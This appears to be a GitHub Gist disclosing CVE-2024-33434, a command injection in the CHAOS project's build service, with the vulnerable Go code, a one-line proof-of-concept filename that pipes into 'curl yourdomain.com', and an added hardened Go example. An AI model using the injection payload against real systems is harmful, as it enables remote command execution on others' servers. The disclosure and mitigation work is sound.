
@slimwang
Last active May 7, 2024 00:34
CVE-2024-33434

  • affected product: https://github.com/tiagorlampert/CHAOS
  • affected version: all commits before 1b451cf62582295b7225caf5a7b506f0bad56f6b and 24c9e109b5be34df7b2bce8368eae669c481ed5e
  • vulnerability type: RCE (Command Injection)

Details

In services/client_service.go, the author builds the command line from the buildStr format string with fmt.Sprintf(), then executes the result through a shell with exec.Command("sh", "-c", ...):

const buildStr = `GO_ENABLED=1 GOOS=%s GOARCH=amd64 go build -ldflags '%s -s -w -X main.Version=%s -X main.ServerPort=%s -X main.ServerAddress=%s -X main.Token=%s -extldflags "-static"' -o ../temp/%s main.go`
filename := handleFilename(input.OSTarget, input.Filename)
filename = handleFilename(input.OSTarget, filename)
buildCmd := fmt.Sprintf(buildStr, handleOSType(input.OSTarget), runHidden(input.RunHidden), c.appVersion, input.ServerPort, input.ServerAddress, token, filename)
cmd := exec.Command("sh", "-c", buildCmd)

Because the filename variable is attacker-controlled, a user can submit a filename like the following to inject a command into buildStr, which the shell then executes:

filename := handleFilename(input.OSTarget, "1 main.go | curl yourdomain.com |cat")
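As an added example (not code from this Gist or from the CHAOS project), the Go program below contrasts the vulnerable pattern with a hardened build step: the output file name is validated against a strict allowlist before use, the -X values are checked for linker-argument separators, and the compiler is invoked with an argv slice instead of through `sh -c`, so shell metacharacters are never parsed. The BuildRequest type and the SafeFilename, SafeLdValue, BuildArgv and UnsafeCommandLine functions are names assumed for this example; the payload string is taken from the PoC above.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"os/exec"
	"regexp"
	"strings"
)

// BuildRequest holds the attacker-reachable fields named in the advisory.
// This is a hypothetical struct; the project's real input type is not shown.
type BuildRequest struct {
	Filename      string
	ServerAddress string
	ServerPort    string
	Token         string
}

// filenameRe is the allowlist: a bare file name of letters, digits, dot,
// underscore and hyphen, not starting with a dot or hyphen. Spaces, pipes,
// quotes and slashes (the PoC's ingredients) never match.
var filenameRe = regexp.MustCompile(`^[A-Za-z0-9_][A-Za-z0-9._-]{0,63}$`)

var (
	ErrBadFilename = errors.New("filename contains characters outside the allowlist")
	ErrBadValue    = errors.New("value would be split into extra linker arguments")
)

// SafeFilename validates an untrusted output file name and additionally
// rejects ".." so the name cannot escape the ../temp/ output directory.
func SafeFilename(name string) (string, error) {
	if !filenameRe.MatchString(name) || strings.Contains(name, "..") {
		return "", ErrBadFilename
	}
	return name, nil
}

// SafeLdValue keeps a -X value to a single linker token. go splits -ldflags
// with shell-style quoting, so whitespace or quotes in a value could smuggle
// in additional linker flags even without a shell.
func SafeLdValue(v string) (string, error) {
	if v == "" || strings.ContainsAny(v, " \t\r\n\"'\\") {
		return "", ErrBadValue
	}
	return v, nil
}

// BuildArgv returns the argv for `go build` with every field as its own
// argument. No shell is involved, so "| curl ..." in any field is just bytes.
func BuildArgv(req BuildRequest, version string) ([]string, error) {
	filename, err := SafeFilename(req.Filename)
	if err != nil {
		return nil, err
	}
	vals := make([]string, 0, 3)
	for _, v := range []string{req.ServerPort, req.ServerAddress, req.Token} {
		ok, err := SafeLdValue(v)
		if err != nil {
			return nil, err
		}
		vals = append(vals, ok)
	}
	ldflags := fmt.Sprintf("-s -w -X main.Version=%s -X main.ServerPort=%s -X main.ServerAddress=%s -X main.Token=%s -extldflags \"-static\"",
		version, vals[0], vals[1], vals[2])
	return []string{"go", "build", "-ldflags", ldflags, "-o", "../temp/" + filename, "main.go"}, nil
}

// UnsafeCommandLine reproduces the vulnerable shape for comparison: the raw
// filename is interpolated into one string that `sh -c` would parse.
func UnsafeCommandLine(filename string) string {
	return fmt.Sprintf("go build -o ../temp/%s main.go", filename)
}

func main() {
	payload := "1 main.go | curl yourdomain.com |cat" // constructed from the advisory's PoC

	fmt.Println("vulnerable string handed to sh -c:", UnsafeCommandLine(payload))
	if _, err := BuildArgv(BuildRequest{Filename: payload, ServerPort: "8080", ServerAddress: "127.0.0.1", Token: "tok"}, "5.0"); err != nil {
		fmt.Println("hardened path rejects payload:", err)
	}

	argv, err := BuildArgv(BuildRequest{Filename: "client", ServerPort: "8080", ServerAddress: "127.0.0.1", Token: "tok"}, "5.0")
	if err != nil {
		fmt.Println("unexpected:", err)
		return
	}
	// Direct argv, no "sh -c"; GOOS/GOARCH go in the environment, not the command string.
	cmd := exec.Command(argv[0], argv[1:]...)
	cmd.Env = append(os.Environ(), "GOOS=linux", "GOARCH=amd64")
	fmt.Println("would run:", cmd.Args) // not executed here: no main.go to build in this example
}
```

The two checks are independent layers: the argv form alone already stops the shell pipeline in the PoC, and the allowlist makes the rejection explicit and auditable in logs rather than relying on `go build` to fail on a strange file name.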

Reference

tiagorlampert/CHAOS#95
